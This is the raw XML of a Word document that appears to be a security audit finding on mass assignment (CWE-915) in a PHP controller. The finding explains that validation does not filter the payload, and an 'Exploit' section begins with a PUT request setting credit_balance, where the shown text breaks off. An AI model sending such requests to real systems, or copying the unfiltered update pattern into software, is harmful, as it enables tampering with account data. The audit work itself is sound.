wNxvoOgfLhnem+969r/U8ua/AAAA//8DAFBLAwQUAAYACAAAACEAVN0DDN0A&#10;AAAGAQAADwAAAGRycy9kb3ducmV2LnhtbEyPwWrDMBBE74X8g9hAb41kl4TiWg4htD2FQpNC6W1j&#10;bWwTa2UsxXb+vkov7WVhmGHmbb6ebCsG6n3jWEOyUCCIS2carjR8Hl4fnkD4gGywdUwaruRhXczu&#10;csyMG/mDhn2oRCxhn6GGOoQuk9KXNVn0C9cRR+/keoshyr6SpscxlttWpkqtpMWG40KNHW1rKs/7&#10;i9XwNuK4eUxeht35tL1+H5bvX7uEtL6fT5tnEIGm8BeGG35EhyIyHd2FjRethvhI+L03T6VqCeKo&#10;IV0lCcgil//xix8AAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YAAACUAQAACwAA&#10;AAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAF5zEVQoKAADxRQAADgAA&#10;AAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAVN0DDN0AAAAGAQAA&#10;DwAAAAAAAAAAAAAAAABkDAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAAG4NAAAAAA==&#10;">
                <v:shape id="Shape 1118" o:spid="_x0000_s1140" style="position:absolute;top:5055;width:64801;height:7143;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="6480126,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GDxQAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8Mw&#10;DIXvg/4Ho8Fuq5Md1pHVLWV04EMZWzd2FrGahMayid0k/ffVYbCbxHt679N6O/tejTSkLrCBclmA&#10;Iq6D67gx8PP9/vgCKmVkh31gMnClBNvN4m6NlQsTf9F4zI2SEE4VGmhzjpXWqW7JY1qGSCzaKQwe&#10;s6xDo92Ak4T7Xj8VxbP22LE0tBjpraX6fLx4A+Pvx6Ho08nG1WE1WRvtZf9pjXm4n3evoDLN+d/8&#10;d22d4Jel4Mo3MoLe3AAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQAo+zGDxQAAAN0AAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" path="m19050,l6467474,v2527,,4956,477,7290,1445l6480126,5028r,704307l6474764,712918v-2334,967,-4763,1451,-7290,1457l19050,714375v-2526,-6,-4956,-490,-7290,-1457c9426,711950,7366,710574,5580,708788,3793,707002,2417,704937,1450,702605l,695325,,19050,1450,11751c2417,9413,3793,7355,5580,5575,7366,3789,9426,2412,11760,1445,14094,477,16524,,19050,xe" fillcolor="#102b46" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,6480126,714375"/>
                </v:shape>
                <v:rect id="Rectangle 1122" o:spid="_x0000_s1141" style="position:absolute;width:587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4B31264C" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRPr="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                          <w:rPr>
                            <w:color w:val="auto"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r w:rsidRPr="00CA733A">
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="auto"/>
                          </w:rPr>
                          <w:t>OWASP</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1123" o:spid="_x0000_s1142" style="position:absolute;left:4418;width:17114;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37970B86" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve"> A08:2021 / API6:2023 · </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1124" o:spid="_x0000_s1143" style="position:absolute;left:17286;width:684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38A1EC52" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRPr="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                          <w:rPr>
                            <w:color w:val="auto"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r w:rsidRPr="00CA733A">
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="auto"/>
                          </w:rPr>
                          <w:t>CWE-915</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1125" o:spid="_x0000_s1144" style="position:absolute;left:22431;width:140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36F3DB0F" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve"> · </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1126" o:spid="_x0000_s1145" style="position:absolute;left:23486;width:3507;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44279D0D" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRPr="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                          <w:rPr>
                            <w:color w:val="auto"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r w:rsidRPr="00CA733A">
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="auto"/>
                          </w:rPr>
                          <w:t>High</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1127" o:spid="_x0000_s1146" style="position:absolute;top:2571;width:736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3EC0C3F4" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="0B2D56"/>
                          </w:rPr>
                          <w:t>Evidence.</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1128" o:spid="_x0000_s1147" style="position:absolute;left:5542;top:2571;width:438;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042A4561" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 1129" o:spid="_x0000_s1148" style="position:absolute;left:5905;top:2483;width:15621;height:1333;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="15621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WxQAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9La4NA&#10;EL4X+h+WKfQizaqH1JpspAkUbG959NDb4E7Uxp0Vd2Psv88WArnNx/ecZTGZTow0uNaygmQWgyCu&#10;rG65VnDYf7xkIJxH1thZJgV/5KBYPT4sMdf2wlsad74WIYRdjgoa7/tcSlc1ZNDNbE8cuKMdDPoA&#10;h1rqAS8h3HQyjeO5NNhyaGiwp01D1Wl3Ngp+kzo1UfT5U65Pr3s+fK+zr2pS6vlpel+A8DT5u/jm&#10;LnWYn6Rv8P9NOEGurgAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQAwt/bWxQAAAN0AAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" path="m9525,l1552575,v2630,,4875,924,6735,2784c1561170,4645,1562100,6890,1562100,9525r,114300c1562100,126454,1561170,128699,1559310,130559v-1860,1855,-4105,2785,-6735,2791l9525,133350v-2630,-6,-4875,-936,-6735,-2791c930,128699,,126454,,123825l,9525c,6890,930,4645,2790,2784,4650,924,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,1562100,133350"/>
                </v:shape>
                <v:rect id="Rectangle 1130" o:spid="_x0000_s1149" style="position:absolute;left:6142;top:2719;width:2015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64B456A1" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                          <w:t>CustomerController.php:148</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1131" o:spid="_x0000_s1150" style="position:absolute;left:21566;top:2571;width:9711;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756C47C2" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve">. The method </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1132" o:spid="_x0000_s1151" style="position:absolute;left:28868;top:2571;width:342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5609E58C" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:i/>
                          </w:rPr>
                          <w:t>does</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1133" o:spid="_x0000_s1152" style="position:absolute;left:31442;top:2571;width:3675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54B8004D" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve"> validate first, which is what makes this easy to miss:</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1134" o:spid="_x0000_s1153" style="position:absolute;left:1007;top:6510;width:5287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31F07F03" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>$request-&gt;</w:t>
                        </w:r>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>validate(</w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>[ ... '</w:t>
                        </w:r>
                        <w:proofErr w:type="spellStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>credit_balance</w:t>
                        </w:r>
                        <w:proofErr w:type="spellEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>' =&gt; 'nullable|numeric|min:0</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w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1135" o:spid="_x0000_s1154" style="position:absolute;left:1007;top:8224;width:4925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72456549" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>$data = $request-&gt;</w:t>
                        </w:r>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve">all();   </w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve">   // rules checked; payload NOT filtered</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1136" o:spid="_x0000_s1155" style="position:absolute;left:1007;top:10034;width:1810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6B4BA17F" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>$customer-&gt;update($data);</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1137" o:spid="_x0000_s1156" style="position:absolute;top:13716;width:47454;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4F7F6844" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRPr="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                          <w:rPr>
                            <w:color w:val="auto"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r w:rsidRPr="00CA733A">
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="auto"/>
                          </w:rPr>
                          <w:t>Validation checks the keys it lists; it does not filter the payload.</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1138" o:spid="_x0000_s1157" style="position:absolute;left:35680;top:13716;width:37379;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65CFDE87" w14:textId="6C144564" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve">  Any other key present in the request including any</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1139" o:spid="_x0000_s1158" style="position:absolute;top:15430;width:719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7298DB79" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve">column in </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 1140" o:spid="_x0000_s1159" style="position:absolute;left:5429;top:15246;width:5810;height:1334;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="5810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pMxAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BSwMx&#10;EIXvQv9DmII3m6yUxW6bFhEE8WYVSm/DZtxd3UyWJG6jv945CN5meG/e+2Z3KH5UM8U0BLZQrQwo&#10;4ja4gTsLb6+PN3egUkZ2OAYmC9+U4LBfXO2wceHCLzQfc6ckhFODFvqcp0br1PbkMa3CRCzae4ge&#10;s6yx0y7iRcL9qG+NqbXHgaWhx4keemo/j1/ewiaezLquzPOZf+Z6/KByCrlYe70s91tQmUr+N/9d&#10;PznBr9bCL9/ICHr/CwAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAEStikzEAAAA3QAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m9525,l571500,v2630,,4875,930,6735,2784c580095,4645,581025,6896,581025,9525r,114300c581025,126454,580095,128693,578235,130553v-1860,1861,-4105,2791,-6735,2797l9525,133350v-2630,-6,-4875,-936,-6735,-2797c930,128693,,126454,,123825l,9525c,6896,930,4645,2790,2784,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,581025,133350"/>
                </v:shape>
                <v:rect id="Rectangle 1141" o:spid="_x0000_s1160" style="position:absolute;left:5679;top:15483;width:697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6D28A984" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                          <w:t>$fillable</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1142" o:spid="_x0000_s1161" style="position:absolute;left:11194;top:15430;width:2868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4BFC10D5" w14:textId="64C94331" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve"> was mass-assigned untouched. Only </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 1143" o:spid="_x0000_s1162" style="position:absolute;left:32766;top:15246;width:6953;height:1334;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Jz4xQAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9La8JA&#10;EL4L/Q/LCL3prg+sRFcphYIKQbQe9DZkp0lqdjZkt5r467uFQm/z8T1nuW5tJW7U+NKxhtFQgSDO&#10;nCk513D6eB/MQfiAbLByTBo68rBePfWWmBh35wPdjiEXMYR9ghqKEOpESp8VZNEPXU0cuU/XWAwR&#10;Nrk0Dd5juK3kWKmZtFhybCiwpreCsuvx22rYn9RL93U2j3p3qNI0VZdxp7ZaP/fb1wWIQG34F/+5&#10;NybOH00n8PtNPEGufgAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCpOJz4xQAAAN0AAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" path="m9525,l685800,v2630,,4875,930,6735,2784c694395,4645,695325,6896,695325,9525r,114300c695325,126454,694395,128693,692535,130553v-1860,1861,-4105,2791,-6735,2797l9525,133350v-2630,-6,-4875,-936,-6735,-2797c930,128693,,126454,,123825l,9525c,6896,930,4645,2790,2784,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,695325,133350"/>
                </v:shape>
                <v:rect id="Rectangle 1144" o:spid="_x0000_s1163" style="position:absolute;left:33035;top:15483;width:852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201E9A2A" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                          <w:t>validated(</w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                          <w:t>)</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1145" o:spid="_x0000_s1164" style="position:absolute;left:39717;top:15430;width:464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510D0E7B" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve"> filters.</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DA9CF9" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRPr="005C54CB" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
      <w:pPr>
        <w:spacing w:after="0"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Exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C4CCDB" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRPr="005C54CB" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
      <w:pPr>
        <w:spacing w:after="224"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40C1BF29" wp14:editId="63CF5AC3">
                <wp:extent cx="6480126" cy="1057275"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="26233" name="Group 26233"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="6480126" cy="1057275"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6480126" cy="1057275"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1119" name="Shape 1119"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="6480126" cy="1057275"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="6480126" h="1057275">
                                <a:moveTo>
                                  <a:pt x="19050" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="6467474" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6470001" y="0"/>
                                  <a:pt x="6472430" y="477"/>
                                  <a:pt x="6474764" y="1445"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="6480126" y="5028"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6480126" y="1052240"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6474764" y="1055818"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6472430" y="1056785"/>
                                  <a:pt x="6470001" y="1057269"/>
                                  <a:pt x="6467474" y="1057275"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="19050" y="1057275"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="16524" y="1057269"/>
                                  <a:pt x="14094" y="1056785"/>
                                  <a:pt x="11760" y="1055818"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="9426" y="1054850"/>
                                  <a:pt x="7366" y="1053474"/>
                                  <a:pt x="5580" y="1051694"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="3793" y="1049902"/>
                                  <a:pt x="2417" y="1047843"/>
                                  <a:pt x="1450" y="1045511"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="1038225"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="19050"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1450" y="11751"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="2417" y="9420"/>
                                  <a:pt x="3793" y="7361"/>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147" name="Rectangle 1147"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="145504"/>
                            <a:ext cx="3766699" cy="130914"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="7CF15A9F" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>PUT /customers/1 {"</w:t>
                              </w:r>
                              <w:proofErr w:type="spellStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>credit_balance</w:t>
                              </w:r>
                              <w:proofErr w:type="spellEnd"/>
                              <w:r>
